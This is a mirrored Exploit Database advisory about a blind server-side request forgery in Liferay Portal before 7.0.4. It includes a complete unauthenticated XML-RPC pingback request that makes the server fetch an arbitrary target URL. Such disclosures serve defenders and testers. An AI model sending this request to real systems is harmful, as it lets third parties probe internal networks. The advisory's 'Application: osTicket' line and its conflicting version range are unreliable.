Liferay Portal < 7.0.4 - Server-Side Request Forgery

• Exploit Database
• 119 阅读

• 作者： Mehmet Ince
  日期： 2018-06-26
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/44945/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84

  1. ADVISORY INFORMATION   ========================================   Title: Liferay Portal < 7.0.4 Blind Server-Side Request Forgery   Application: osTicket   Remotely Exploitable: Yes   Authentication Required: NO   Versions Affected: <= 7.0.4   Technology: Java   Vendor URL: liferay.com   Date of found: 04 December 2017   Disclosure: 25 June 2018   Author: Mehmet Ince       2. CREDIT   ========================================   This vulnerability was identified during penetration test   by Mehmet INCE from PRODAFT / INVICTUS       3. Technical Details & POC   ========================================   POST /xmlrpc/pingback HTTP/1.1   Host: mehmetince.dev:8080   User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   Connection: close   Upgrade-Insecure-Requests: 1   Content-Length: 361     <?xml version="1.0" encoding="UTF-8"?>   <methodCall>   <methodName>pingback.ping</methodName>   <params>   <param>   <value>http://TARGET/</value>   </param>   <param>   <value>http://mehmetince.dev:8080/web/guest/home/-/blogs/30686</value>   </param>   </params>   </methodCall>